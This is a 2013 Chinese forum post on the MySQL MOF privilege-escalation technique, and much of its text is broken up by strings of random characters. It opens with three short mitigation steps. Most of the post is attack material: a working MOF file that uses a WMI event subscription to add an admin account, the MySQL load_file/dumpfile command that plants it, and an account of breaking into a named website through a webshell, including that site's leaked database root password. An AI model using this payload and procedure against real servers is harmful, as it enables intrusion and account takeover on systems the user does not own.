Mysql mof扩展漏洞防范方法2 D) V. m8 H X) q7 X5 \; _
) J- X1 u1 a5 t$ J7 k+ S0 b* w' J9 H网上公开的一些利用代码:1 X4 _7 R5 x# j; k
1 s% d1 _! Y4 L#pragma namespace(“\\\\.\\root\\subscription”); w3 {4 @% u$ p# ^6 s
, A! n( d/ {" b8 ^instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
, d+ l9 n" u& D
$ [ U( s3 L6 P! `1 Q
4 Y3 Q) E+ R; [ R) v
% o# g" S) W ~7 L, s
3 G$ q( }/ P6 S U6 x% H$ \& p. D; s* _4 G s* Q( [
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;# T# Q+ ~5 b5 V" c& c
从上面代码来看得出解决办法:8 f. [" [/ S% P. z. R, U& i
7 e: g' V/ ~( W$ D4 |, m6 y
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
7 a8 C) F1 ~# L0 O8 _. u. X, d& y7 D5 j- y3 W/ m
2、禁止使用”WScript.Shel”组件
3 y: \$ ^9 [4 K: g, Q" z" B: q) X% T7 B4 ^& ?9 e( b
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
2 j1 M% @& \0 h0 x2 }
: W, x( w* T5 f/ V当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下+ Q& H$ ]( m3 F5 M2 @: c6 S
- h: {5 a' B3 Q+ A# w事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权 o6 c. P2 m0 L+ Y
$ m6 s$ y# k7 o+ R% M& s5 g- }但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容5 G/ n& d" U4 a1 n
* x' r; D) e5 o看懂了后就开始练手吧2 {. K) `) R F I/ F; y( o
D" x: Q3 y" n! C# `
http://www.webbmw.com/config/config_ucenter.php 一句话 a
& [: r8 P% o! U& i7 C
9 m" Q. B2 }; f }1 R8 ~! ~& |$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。& f0 w; Q( |$ z3 W' E/ u3 V
t0 a. \+ Y# a; c$ T- Y7 i Y" ]
于是直接用菜刀开搞
- _# F( l0 `7 c o C5 w% T9 U* N
( L8 d/ _+ B$ v0 }8 N) l5 \上马先7 F2 L* V: h9 C* H, ^ C; A+ z
0 ]& N3 M8 K6 d8 Q
既然有了那些账号 之类的 于是我们就执行吧…….8 W$ ]3 A9 q9 X$ f4 B: C( Z# J
& U8 }, y% g: A3 a) u* p
小小的说下
- q/ d" f0 k0 o; i0 u
1 U/ [+ s$ T6 f3 X* z在这里第1次执行未成功 原因未知
: V% ~0 o4 L, @( u4 v g {2 R+ X0 `
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。2 ^( S; B( ~5 A0 H5 ~7 K, N
6 k6 i9 }' _. l- r9 \
#pragma namespace(“\\\\.\\root\\subscription”): Q, R7 ]/ f: G \2 l8 S
0 L0 P5 `% F" K" h; L e0 h- `4 |
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
7 Z* I7 f: g: G9 w; O \ C* V, S: w4 H% a7 g
我是将文件放到C:\WINDOWS\temp\1.mof1 Y, @- v9 v2 m
3 i# {+ z" z1 U) o) x: R* k9 v所以我们就改下执行的代码
8 p0 h8 g3 Z5 N% |( ~1 w c1 T' G( F, X
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
2 p$ N( C, Q% W$ g- W; Q# u/ b% W! @4 W9 ^6 `% z" T4 i; n# n: m
: w! d/ a$ T. J8 L- W$ i: ?, F9 D+ Z
但是 你会发现账号还是没有躺在那里。。
6 B% s* C) {9 w6 o0 {$ ^# e( g* i I
3 R+ A' ]7 d" Z) ^" p& E于是我就感觉蛋疼; P0 O' }3 M: @; f. Q& }
4 g% F# b. }( K/ P$ B$ k R
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
1 l% k* i- |& S; R, a
7 Q/ P/ g1 ?. j% q6 i+ i9 U% p) K3 ^' x5 A9 G/ R
% y p5 u4 U: M+ C: M5 W$ {% [但是其他库均不成功…
! [3 H- L, e( U' r( p; X
4 V( \- M4 C" ?8 f+ k/ k" q' d% r我就很费解呀 到底为什么不成功求大牛解答…: E: b. f7 Q7 b& d4 j3 C Z
' b! m1 L+ e% D E. I7 M
4 @3 F: G7 Q a: o
: T. _9 ?: n" ]+ ^. O: u |
发表于 2013-1-4 19:49:49
收藏
分享
支持
反对